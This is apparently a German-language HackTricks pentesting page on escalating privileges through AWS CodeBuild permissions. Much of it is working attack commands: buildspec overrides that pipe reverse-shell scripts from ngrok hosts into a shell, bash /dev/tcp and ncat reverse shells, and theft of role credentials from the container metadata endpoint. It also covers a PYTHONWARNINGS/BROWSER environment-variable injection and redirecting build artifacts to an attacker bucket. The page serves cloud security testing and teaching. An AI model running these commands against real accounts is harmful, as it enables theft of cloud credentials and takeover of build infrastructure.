AWS - Codebuild Privesc

Tip

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstütze HackTricks

codebuild

Weitere Informationen:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Allein eine dieser Berechtigungen reicht aus, um einen Build mit einem neuen buildspec auszulösen und das Token der dem Projekt zugewiesenen iam role zu stehlen:

cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml

Hinweis: Der Unterschied zwischen diesen beiden Befehlen ist, dass:

  • StartBuild einen einzelnen Build-Job startet, der eine bestimmte buildspec.yml verwendet.
  • StartBuildBatch es erlaubt, eine Charge von Builds zu starten, mit komplexeren Konfigurationen (z. B. mehrere Builds parallel auszuführen).

Potentielle Auswirkung: Direkter privesc auf an das Projekt angehängte AWS Codebuild-Rollen.

StartBuild Env-Variablen-Override

Selbst wenn du das Projekt nicht ändern kannst (UpdateProject) und du das buildspec nicht überschreiben kannst, erlaubt codebuild:StartBuild dennoch, Env-Variablen zur Build-Zeit zu überschreiben über:

  • CLI: --environment-variables-override
  • API: environmentVariablesOverride

Wenn der Build Umgebungsvariablen verwendet, um das Verhalten zu steuern (Ziel-Buckets, Feature-Flags, Proxy-Einstellungen, Logging usw.), kann das ausreichen, um exfiltrate secrets zu ermöglichen, auf die die Build-Rolle zugreifen kann, oder um code execution innerhalb des Builds zu erreichen.

Beispiel 1: Redirect Artifact/Upload Destination to Exfiltrate Secrets

Wenn der Build ein Artifact in einen Bucket/Pfad veröffentlicht, der durch eine Env-Variable kontrolliert wird (zum Beispiel UPLOAD_BUCKET), überschreibe diese auf einen vom Angreifer kontrollierten Bucket:

export PROJECT="<project-name>"
export EXFIL_BUCKET="<attacker-controlled-bucket>"

export BUILD_ID=$(aws codebuild start-build \
--project-name "$PROJECT" \
--environment-variables-override name=UPLOAD_BUCKET,value="$EXFIL_BUCKET",type=PLAINTEXT \
--query build.id --output text)

# Wait for completion
while true; do
STATUS=$(aws codebuild batch-get-builds --ids "$BUILD_ID" --query 'builds[0].buildStatus' --output text)
[ "$STATUS" = "SUCCEEDED" ] && break
[ "$STATUS" = "FAILED" ] || [ "$STATUS" = "FAULT" ] || [ "$STATUS" = "STOPPED" ] || [ "$STATUS" = "TIMED_OUT" ] && exit 1
sleep 5
done

# Example expected location (depends on the buildspec/project logic):
aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -
Beispiel 2: Python Startup Injection über PYTHONWARNINGS + BROWSER

Wenn der Build python3 ausführt (häufig in buildspecs), kann man manchmal code execution erreichen, ohne das buildspec anzufassen, indem man Folgendes missbraucht:

  • PYTHONWARNINGS: Python wertet das category-Feld aus und importiert punktgetrennte Pfade. Das Setzen auf ...:antigravity.x:... erzwingt das Importieren des Standardbibliotheksmoduls antigravity.
  • antigravity: ruft webbrowser.open(...) auf.
  • BROWSER: steuert, was webbrowser ausführt. Unter Linux ist es :-separiert. Die Verwendung von #%s macht das URL-Argument zu einem Shell-Kommentar.

Das kann verwendet werden, um die CodeBuild-Rollen-Credentials (von http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) in die CloudWatch-Logs zu schreiben und sie anschließend auszulesen, falls man Leseberechtigungen für die Logs hat.

Ausklappbar: StartBuild JSON-Anfrage für den PYTHONWARNINGS + BROWSER Trick ```json { "projectName": "codebuild_lab_7_project", "environmentVariablesOverride": [ { "name": "PYTHONWARNINGS", "value": "all:0:antigravity.x:0:0", "type": "PLAINTEXT" }, { "name": "BROWSER", "value": "/bin/sh -c 'echo CREDS_START; URL=$(printf \"http\\\\072//169.254.170.2%s\" \"$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"); curl -s \"$URL\"; echo CREDS_END' #%s", "type": "PLAINTEXT" } ] } ```

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Ein Angreifer mit den Berechtigungen iam:PassRole, codebuild:CreateProject und codebuild:StartBuild oder codebuild:StartBuildBatch könnte die Privilegien auf jede codebuild IAM-Rolle eskalieren, indem er einen laufenden Build startet.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potential Impact: Direkter privesc auf jede AWS Codebuild-Rolle.

Warning

In einem Codebuild container enthält die Datei /codebuild/output/tmp/env.sh alle benötigten Env-Variablen, um auf die metadata credentials zuzugreifen.

Diese Datei enthält die env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, die den URL path zum Zugriff auf die Anmeldeinformationen enthält. Er sieht etwa so aus: /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Hänge diesen Pfad an die URL http://169.254.170.2/ an, dann kannst du die Rollenanmeldeinformationen auslesen.

Außerdem enthält sie die env variable ECS_CONTAINER_METADATA_URI, die die vollständige URL liefert, um metadata info about the container zu erhalten.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Wie im vorherigen Abschnitt: Wenn du anstatt ein Build-Projekt neu zu erstellen dieses modifizieren kannst, kannst du die IAM-Rolle angeben und das Token stehlen

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Mögliche Auswirkung: Direkter privesc auf jede AWS Codebuild-Rolle.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Wie im vorherigen Abschnitt, aber ohne die iam:PassRole-Berechtigung, kannst du diese Berechtigungen missbrauchen, um vorhandene Codebuild-Projekte zu ändern und auf die ihnen bereits zugewiesene Rolle zuzugreifen.

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potentieller Einfluss: Direkte privesc auf angehängte AWS Codebuild-Rollen.

SSM

Mit ausreichenden Berechtigungen, um eine ssm session zu starten ist es möglich, innerhalb eines Codebuild-Projekts zu gelangen, das gerade gebaut wird.

Das Codebuild-Projekt muss einen breakpoint enthalten:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

Und dann:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

Für weitere Informationen check the docs.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Ein Angreifer, der in der Lage ist, den Build eines bestimmten CodeBuild-Projekts zu starten/neuzustarten, das seine buildspec.yml-Datei in einem S3-Bucket speichert, auf den der Angreifer Schreibzugriff hat, kann Befehlsausführung im CodeBuild-Prozess erlangen.

Hinweis: Die Eskalation ist nur relevant, wenn der CodeBuild-Worker eine andere Rolle hat, idealerweise privilegierter als die des Angreifers.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Du kannst so etwas wie dieses buildspec verwenden, um eine reverse shell zu erhalten:

version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Auswirkung: Direkter privesc auf die Rolle, die vom AWS CodeBuild-Worker verwendet wird und normalerweise hohe Privilegien hat.

Warning

Beachten Sie, dass das buildspec möglicherweise im zip-Format erwartet wird; ein Angreifer müsste es herunterladen, entzippen, die buildspec.yml im Stammverzeichnis ändern, wieder zippen und hochladen

Weitere Details finden Sie hier.

Potentielle Auswirkungen: Direkter privesc auf angehängte AWS Codebuild-Rollen.

Tip

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstütze HackTricks